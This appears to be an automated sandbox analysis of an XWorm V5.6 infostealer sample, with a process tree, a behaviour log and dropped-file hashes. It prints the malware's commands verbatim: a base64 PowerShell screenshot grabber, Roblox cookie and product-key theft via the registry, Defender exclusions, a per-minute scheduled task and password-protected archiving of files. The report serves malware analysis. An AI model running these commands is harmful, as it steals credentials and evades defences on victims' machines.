AAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                              7⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:5392
                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\otulmxfd\otulmxfd.cmdline"
                                8⤵
                                  PID:6000
                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3023.tmp" "c:\Users\Admin\AppData\Local\Temp\otulmxfd\CSC92387EC055CD42F3AAE447D381A63FFC.TMP"
                                    9⤵
                                      PID:5156
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                6⤵
                                  PID:5760
                                  • C:\Windows\system32\tree.com
                                    tree /A /F
                                    7⤵
                                      PID:5976
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                    6⤵
                                      PID:5776
                                      • C:\Windows\system32\attrib.exe
                                        attrib -r C:\Windows\System32\drivers\etc\hosts
                                        7⤵
                                        • Drops file in Drivers directory
                                        • Views/modifies file attributes
                                        PID:5952
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                      6⤵
                                        PID:6100
                                        • C:\Windows\system32\attrib.exe
                                          attrib +r C:\Windows\System32\drivers\etc\hosts
                                          7⤵
                                          • Drops file in Drivers directory
                                          • Views/modifies file attributes
                                          PID:5136
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                        6⤵
                                          PID:5180
                                          • C:\Windows\system32\tree.com
                                            tree /A /F
                                            7⤵
                                              PID:5132
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                            6⤵
                                              PID:3624
                                              • C:\Windows\system32\tasklist.exe
                                                tasklist /FO LIST
                                                7⤵
                                                • Enumerates processes with tasklist
                                                PID:5276
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                                              6⤵
                                                PID:5524
                                                • C:\Windows\system32\tree.com
                                                  tree /A /F
                                                  7⤵
                                                    PID:5712
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                  6⤵
                                                    PID:5460
                                                    • C:\Windows\system32\tree.com
                                                      tree /A /F
                                                      7⤵
                                                        PID:5204
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                      6⤵
                                                        PID:2076
                                                        • C:\Windows\system32\tree.com
                                                          tree /A /F
                                                          7⤵
                                                            PID:5944
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                          6⤵
                                                            PID:5896
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                              7⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              PID:5244
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                            6⤵
                                                              PID:5636
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                7⤵
                                                                  PID:5696
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "getmac"
                                                                6⤵
                                                                  PID:5172
                                                                  • C:\Windows\system32\getmac.exe
                                                                    getmac
                                                                    7⤵
                                                                      PID:3628
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI19922\rar.exe a -r -hp"1" "C:\Users\Admin\AppData\Local\Temp\qGjri.zip" *"
                                                                    6⤵
                                                                      PID:5808
                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI19922\rar.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\_MEI19922\rar.exe a -r -hp"1" "C:\Users\Admin\AppData\Local\Temp\qGjri.zip" *
                                                                        7⤵
                                                                        • Executes dropped EXE
                                                                        PID:5256
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                      6⤵
                                                                        PID:1560
                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                          wmic os get Caption
                                                                          7⤵
                                                                            PID:1152
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                          6⤵
                                                                            PID:6004
                                                                            • C:\Windows\System32\Conhost.exe
                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              7⤵
                                                                                PID:6100
                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                wmic computersystem get totalphysicalmemory
                                                                                7⤵
                                                                                  PID:2136
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                6⤵
                                                                                  PID:4496
                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    7⤵
                                                                                      PID:4016
                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                      wmic csproduct get uuid
                                                                                      7⤵
                                                                                        PID:5516
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                      6⤵
                                                                                        PID:5792
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                          7⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          PID:5728
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                        6⤵
                                                                                          PID:3000
                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                            wmic path win32_VideoController get name
                                                                                            7⤵
                                                                                            • Detects videocard installed
                                                                                            PID:5244
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                          6⤵
                                                                                            PID:5236
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                              7⤵
                                                                                                PID:2988
                                                                                        • C:\Users\Public\Stub.exe
                                                                                          "C:\Users\Public\Stub.exe"
                                                                                          4⤵
                                                                                          • Executes dropped EXE
                                                                                          • Accesses Microsoft Outlook profiles
                                                                                          • Drops desktop.ini file(s)
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Checks processor information in registry
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          • outlook_office_path
                                                                                          • outlook_win_path
                                                                                          PID:1668
                                                                                  • C:\Windows\System32\SystemSettings.exe
                                                                                    "C:\Windows\System32\SystemSettings.exe"
                                                                                    1⤵
                                                                                    • Checks computer location settings
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:2472
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\SystemSettings.exe'
                                                                                      2⤵
                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                      PID:4760
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SystemSettings.exe'
                                                                                      2⤵
                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                      PID:3136
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\SystemSettings.exe'
                                                                                      2⤵
                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                      PID:3476
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SystemSettings.exe'
                                                                                      2⤵
                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                      PID:3780
                                                                                    • C:\Windows\System32\schtasks.exe
                                                                                      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SystemSettings" /tr "C:\Users\Public\SystemSettings.exe"
                                                                                      2⤵
                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                      PID:5452
                                                                                  • C:\Windows\system32\wbem\WmiApSrv.exe
                                                                                    C:\Windows\system32\wbem\WmiApSrv.exe
                                                                                    1⤵
                                                                                      PID:5212
                                                                                    • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe
                                                                                      C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe -Embedding
                                                                                      1⤵
                                                                                      • Drops file in Windows directory
                                                                                      PID:1644
                                                                                    • C:\Windows\system32\AUDIODG.EXE
                                                                                      C:\Windows\system32\AUDIODG.EXE 0x308 0x2ec
                                                                                      1⤵
                                                                                        PID:5260
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\ClearRead.cmd" C:\Users\Admin\Desktop\GetSkip.emf"
                                                                                        1⤵
                                                                                          PID:2116

                                                                                        Network

                                                                                        MITRE ATT&CK Enterprise v15

                                                                                        Replay Monitor

                                                                                        Loading Replay Monitor...

                                                                                        Downloads

                                                                                        • C:\ProgramData\csrss.lnk

                                                                                          Filesize

                                                                                          1KB

                                                                                          MD5

                                                                                          f7d355e3ea55be34745b04c104a26d17

                                                                                          SHA1

                                                                                          89ec69d511407ac8eb38064243e4298add505b4b

                                                                                          SHA256

                                                                                          68e1e32a389672539fbb6795bb7aba97b5c86c3e28539df5ff782a4f7e9f35d0

                                                                                          SHA512

                                                                                          6cf9d6460bbaf344d451bdfc091347e4eebbbc4afbd98e9f78db04d8e8de1619e2666e71a545cdf6df8f1ea1f64a20e0be79068b3c985e46f7321510d755bfd2

                                                                                        • C:\Users\Admin\AppData\Local\189ad97a9ba817a0471d7ba615ec6249\msgid.dat

                                                                                          Filesize

                                                                                          1B

                                                                                          MD5

                                                                                          cfcd208495d565ef66e7dff9f98764da

                                                                                          SHA1

                                                                                          b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                                                                                          SHA256

                                                                                          5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                                                                                          SHA512

                                                                                          31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SystemSettings.exe.log

                                                                                          Filesize

                                                                                          1KB

                                                                                          MD5

                                                                                          ebec742e1cbb74325a031bc4d3098d4a

                                                                                          SHA1

                                                                                          47dcd96d01fdba6128f12a98c2a0e5982fd33cfc

                                                                                          SHA256

                                                                                          4443a8e14d18d1c03b865eabfca6787ac6c523c1edef61809341a680c26b7080

                                                                                          SHA512

                                                                                          53480bad0abf1cb1389f25e9f01c133e3bdabf68254d98a83b722cd3523b4b95c0e38292e51be90e0860481462c805138b29a1d77d899401fa836e346d5f9dcf

                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                          Filesize

                                                                                          3KB

                                                                                          MD5

                                                                                          3eb3833f769dd890afc295b977eab4b4

                                                                                          SHA1

                                                                                          e857649b037939602c72ad003e5d3698695f436f

                                                                                          SHA256

                                                                                          c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

                                                                                          SHA512

                                                                                          c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                          Filesize

                                                                                          1KB

                                                                                          MD5

                                                                                          f0f59cccd39a3694e0e6dfd44d0fa76d

                                                                                          SHA1

                                                                                          fccd7911d463041e1168431df8823e4c4ea387c1

                                                                                          SHA256

                                                                                          70466c7f3a911368d653396fdd68f993322c69e1797b492ca00f8be34b7f3401

                                                                                          SHA512

                                                                                          5c726e1e28cb9c0c3ab963fbfbf471c6033839f3e535a3811581fdaa4da17175e5a8a8be84a4fccd99b81e048058e51d230ff3836e3ec920057a1b1676110bee

                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                          Filesize

                                                                                          1KB

                                                                                          MD5

                                                                                          1a7c1e355d81cd566e2aa0d8e6346736

                                                                                          SHA1

                                                                                          215718b34fdf7b3831021598b40d2b4164ff8318

                                                                                          SHA256

                                                                                          03c4675dff5b18105bce27e02d04b49f20e1dc60e883ad6859a002150a634df1

                                                                                          SHA512

                                                                                          2a6049bf1ffcc74ba1874503d740e2623884ca62514c38d451a163aa39531e78067fd43050bc1e1280d7070397aaa482f8313fcb7d21c45a4e813e6fd89171c5

                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zE4B5382D7\XWorm V5.6\Icons\icon (15).ico

                                                                                          Filesize

                                                                                          361KB

                                                                                          MD5

                                                                                          e3143e8c70427a56dac73a808cba0c79

                                                                                          SHA1

                                                                                          63556c7ad9e778d5bd9092f834b5cc751e419d16

                                                                                          SHA256

                                                                                          b2f57a23ecc789c1bbf6037ac0825bf98babc7bf0c5d438af5e2767a27a79188

                                                                                          SHA512

                                                                                          74e0f4b55625df86a87b9315e4007be8e05bbecca4346a6ea06ef5b1528acb5a8bb636ef3e599a3820dbddcf69563a0a22e2c1062c965544fd75ec96fd9803fc

                                                                                        • C:\Users\Admin\AppData\Local\Temp\GeoIP.dat

                                                                                          Filesize

                                                                                          1.2MB

                                                                                          MD5

                                                                                          8ef41798df108ce9bd41382c9721b1c9

                                                                                          SHA1

                                                                                          1e6227635a12039f4d380531b032bf773f0e6de0

                                                                                          SHA256

                                                                                          bc07ff22d4ee0b6fafcc12482ecf2981c172a672194c647cedf9b4d215ad9740

                                                                                          SHA512

                                                                                          4c62af04d4a141b94eb3e1b0dbf3669cb53fe9b942072ed7bea6a848d87d8994cff5a5f639ab70f424eb79a4b7adabdde4da6d2f02f995bd8d55db23ce99f01b

                                                                                        • C:\Users\Admin\AppData\Local\Temp\Guna.UI2.dll

                                                                                          Filesize

                                                                                          1.9MB

                                                                                          MD5

                                                                                          bcc0fe2b28edd2da651388f84599059b

                                                                                          SHA1

                                                                                          44d7756708aafa08730ca9dbdc01091790940a4f

                                                                                          SHA256

                                                                                          c6264665a882e73eb2262a74fea2c29b1921a9af33180126325fb67a851310ef

                                                                                          SHA512

                                                                                          3bfc3d27c095dde988f779021d0479c8c1de80a404454813c6cae663e3fe63dc636bffa7de1094e18594c9d608fa7420a0651509544722f2a00288f0b7719cc8

                                                                                        • C:\Users\Admin\AppData\Local\Temp\Sounds\Intro.wav

                                                                                          Filesize

                                                                                          238KB

                                                                                          MD5

                                                                                          ad3b4fae17bcabc254df49f5e76b87a6

                                                                                          SHA1

                                                                                          1683ff029eebaffdc7a4827827da7bb361c8747e

                                                                                          SHA256

                                                                                          e3e5029bf5f29fa32d2f6cdda35697cd8e6035d5c78615f64d0b305d1bd926cf

                                                                                          SHA512

                                                                                          3d6ecc9040b5079402229c214cb5f9354315131a630c43d1da95248edc1b97627fb9ba032d006380a67409619763fb91976295f8d22ca91894c88f38bb610cd3

                                                                                        • C:\Users\Admin\AppData\Local\Temp\XWorm V5.6.exe

                                                                                          Filesize

                                                                                          13.1MB

                                                                                          MD5

                                                                                          3a378f90d75b5ffb3024801f1b8d8e80

                                                                                          SHA1

                                                                                          7c5db2bf0befecaa70801c9d8be133703b98e022

                                                                                          SHA256

                                                                                          1b99d3da0ff2535adfb4480bd069665040fd6391248fdcb1b197184f8f03b773

                                                                                          SHA512

                                                                                          8a60bb58a09a3814da0bf1f92af264535f0c9612a5f178aa6d711f4d558d9b641859915e0d0434eb8f97e0ac28c686cbe65192be64393875a4744c79da7ad27c

                                                                                        • C:\Users\Admin\AppData\Local\Temp\Zip-7.exe

                                                                                          Filesize

                                                                                          175KB

                                                                                          MD5

                                                                                          94aa6429967df94830b47b195f7ecb82

                                                                                          SHA1

                                                                                          a8b9ff9341ba0145d25747c78f9b530caa424bdc

                                                                                          SHA256

                                                                                          57458e0739c0fd50cbfa1a0d663e365938b8f7679111f8a780171e063fae37a3

                                                                                          SHA512

                                                                                          6f2cf1d354e1025da61f1659641a150a70a5edf2a18a6e010ad8f91de7b9634df5f2246ec1ac95d79cb1e209faf46fe79f75c2fa5ae618e2b7e0c3797eec1b43

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI19922\VCRUNTIME140.dll

                                                                                          Filesize

                                                                                          106KB

                                                                                          MD5

                                                                                          4585a96cc4eef6aafd5e27ea09147dc6

                                                                                          SHA1

                                                                                          489cfff1b19abbec98fda26ac8958005e88dd0cb

                                                                                          SHA256

                                                                                          a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736

                                                                                          SHA512

                                                                                          d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI19922\_bz2.pyd

                                                                                          Filesize

                                                                                          48KB

                                                                                          MD5

                                                                                          2d461b41f6e9a305dde68e9c59e4110a

                                                                                          SHA1

                                                                                          97c2266f47a651e37a72c153116d81d93c7556e8

                                                                                          SHA256

                                                                                          abbe3933a34a9653a757244e8e55b0d7d3a108527a3e9e8a7f2013b5f2a9eff4

                                                                                          SHA512

                                                                                          eef132df6e52eb783bad3e6af0d57cb48cda2eb0edb6e282753b02d21970c1eea6bab03c835ff9f28f2d3e25f5e9e18f176a8c5680522c09da358a1c48cf14c8

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI19922\_ctypes.pyd

                                                                                          Filesize

                                                                                          58KB

                                                                                          MD5

                                                                                          1adfe4d0f4d68c9c539489b89717984d

                                                                                          SHA1

                                                                                          8ae31b831b3160f5b88dda58ad3959c7423f8eb2

                                                                                          SHA256

                                                                                          64e8fd952ccf5b8adca80ce8c7bc6c96ec7df381789256fe8d326f111f02e95c

                                                                                          SHA512

                                                                                          b403cc46e0874a75e3c0819784244ed6557eae19b0d76ffd86f56b3739db10ea8deec3dc1ca9e94c101263d0ccf506978443085a70c3ab0816885046b5ef5117

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI19922\_decimal.pyd

                                                                                          Filesize

                                                                                          106KB

                                                                                          MD5

                                                                                          a8952538e090e2ff0efb0ba3c890cd04

                                                                                          SHA1

                                                                                          cdc8bd05a3178a95416e1c15b6c875ee026274df

                                                                                          SHA256

                                                                                          c4e8740c5dbbd2741fc4124908da4b65fa9c3e17d9c9bf3f634710202e0c7009

                                                                                          SHA512

                                                                                          5c16f595f17bedaa9c1fdd14c724bbb404ed59421c63f6fbd3bfd54ce8d6f550147d419ec0430d008c91b01b0c42934c2a08dae844c308feec077da713ac842e

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI19922\_hashlib.pyd

                                                                                          Filesize

                                                                                          35KB

                                                                                          MD5

                                                                                          f10d896ed25751ead72d8b03e404ea36

                                                                                          SHA1

                                                                                          eb8e0fd6e2356f76b5ea0cb72ab37399ec9d8ecb

                                                                                          SHA256

                                                                                          3660b985ca47ca1bba07db01458b3153e4e692ee57a8b23ce22f1a5ca18707c3

                                                                                          SHA512

                                                                                          7f234e0d197ba48396fabd1fccc2f19e5d4ad922a2b3fe62920cd485e5065b66813b4b2a2477d2f7f911004e1bc6e5a6ec5e873d8ff81e642fee9e77b428fb42

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI19922\_lzma.pyd

                                                                                          Filesize

                                                                                          85KB

                                                                                          MD5

                                                                                          3798175fd77eded46a8af6b03c5e5f6d

                                                                                          SHA1

                                                                                          f637eaf42080dcc620642400571473a3fdf9174f

                                                                                          SHA256

                                                                                          3c9d5a9433b22538fc64141cd3784800c567c18e4379003329cf69a1d59b2a41

                                                                                          SHA512

                                                                                          1f7351c9e905265625d725551d8ea1de5d9999bc333d29e6510a5bca4e4d7c1472b2a637e892a485a7437ea4768329e5365b209dd39d7c1995fe3317dc5aecdf

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI19922\_queue.pyd

                                                                                          Filesize

                                                                                          25KB

                                                                                          MD5

                                                                                          decdabaca104520549b0f66c136a9dc1

                                                                                          SHA1

                                                                                          423e6f3100013e5a2c97e65e94834b1b18770a87

                                                                                          SHA256

                                                                                          9d4880f7d0129b1de95becd8ea8bbbf0c044d63e87764d18f9ec00d382e43f84

                                                                                          SHA512

                                                                                          d89ee3779bf7d446514fc712dafb3ebc09069e4f665529a7a1af6494f8955ceb040bef7d18f017bcc3b6fe7addeab104535655971be6eed38d0fc09ec2c37d88

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI19922\_socket.pyd

                                                                                          Filesize

                                                                                          43KB

                                                                                          MD5

                                                                                          bcc3e26a18d59d76fd6cf7cd64e9e14d

                                                                                          SHA1

                                                                                          b85e4e7d300dbeec942cb44e4a38f2c6314d3166

                                                                                          SHA256

                                                                                          4e19f29266a3d6c127e5e8de01d2c9b68bc55075dd3d6aabe22cf0de4b946a98

                                                                                          SHA512

                                                                                          65026247806feab6e1e5bf2b29a439bdc1543977c1457f6d3ddfbb7684e04f11aba10d58cc5e7ea0c2f07c8eb3c9b1c8a3668d7854a9a6e4340e6d3e43543b74

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI19922\_sqlite3.pyd

                                                                                          Filesize

                                                                                          56KB

                                                                                          MD5

                                                                                          eb6313b94292c827a5758eea82d018d9

                                                                                          SHA1

                                                                                          7070f715d088c669eda130d0f15e4e4e9c4b7961

                                                                                          SHA256

                                                                                          6b41dfd7d6ac12afe523d74a68f8bd984a75e438dcf2daa23a1f934ca02e89da

                                                                                          SHA512

                                                                                          23bfc3abf71b04ccffc51cedf301fadb038c458c06d14592bf1198b61758810636d9bbac9e4188e72927b49cb490aeafa313a04e3460c3fb4f22bdddf112ae56

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI19922\_ssl.pyd

                                                                                          Filesize

                                                                                          62KB

                                                                                          MD5

                                                                                          2089768e25606262921e4424a590ff05

                                                                                          SHA1

                                                                                          bc94a8ff462547ab48c2fbf705673a1552545b76

                                                                                          SHA256

                                                                                          3e6e9fc56e1a9fe5edb39ee03e5d47fa0e3f6adb17be1f087dc6f891d3b0bbca

                                                                                          SHA512

                                                                                          371aa8e5c722307fff65e00968b14280ee5046cfcf4a1d9522450688d75a3b0362f2c9ec0ec117b2fc566664f2f52a1b47fe62f28466488163f9f0f1ce367f86

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI19922\base_library.zip

                                                                                          Filesize

                                                                                          1.4MB

                                                                                          MD5

                                                                                          9a10c79571a8793a5c9f335bfe68d38e

                                                                                          SHA1

                                                                                          31decadd6282828bb58ad4560e26544bfb889799

                                                                                          SHA256

                                                                                          844953b78342ad526b1bd72f370d4ff0d787845b2f4118d937820a069aa12936

                                                                                          SHA512

                                                                                          2fc7eb094ec3134a8df1b47302f0f2ce93ece08726e9a0c13612003fe1cbbb3c11f08ac89f12603380326176821056edd9ce819d8bff5ccba0039f3950590b07

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI19922\blank.aes

                                                                                          Filesize

                                                                                          123KB

                                                                                          MD5

                                                                                          60be04c1a93d7c97e3d7408e85557c73

                                                                                          SHA1

                                                                                          341d929b8be89dec8d8440f66dff267f42f20837

                                                                                          SHA256

                                                                                          61077d0194c6fa8c3ed388d1961fd8bce2a58cf7a62509910a719eb2136ddc9a

                                                                                          SHA512

                                                                                          f8bb4137ae6a002831804bbf9229f044e057eca2bfbf2a45fe5d66efb20706a0539e1865943431c7890f1e0dcf1414192b383ad891cfa1956c500ffa1033cd84

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI19922\libcrypto-1_1.dll

                                                                                          Filesize

                                                                                          1.1MB

                                                                                          MD5

                                                                                          dffcab08f94e627de159e5b27326d2fc

                                                                                          SHA1

                                                                                          ab8954e9ae94ae76067e5a0b1df074bccc7c3b68

                                                                                          SHA256

                                                                                          135b115e77479eedd908d7a782e004ece6dd900bb1ca05cc1260d5dd6273ef15

                                                                                          SHA512

                                                                                          57e175a5883edb781cdb2286167d027fdb4b762f41fb1fc9bd26b5544096a9c5dda7bccbb6795dcc37ed5d8d03dc0a406bf1a59adb3aeb41714f1a7c8901a17d

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI19922\libffi-8.dll

                                                                                          Filesize

                                                                                          29KB

                                                                                          MD5

                                                                                          08b000c3d990bc018fcb91a1e175e06e

                                                                                          SHA1

                                                                                          bd0ce09bb3414d11c91316113c2becfff0862d0d

                                                                                          SHA256

                                                                                          135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

                                                                                          SHA512

                                                                                          8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

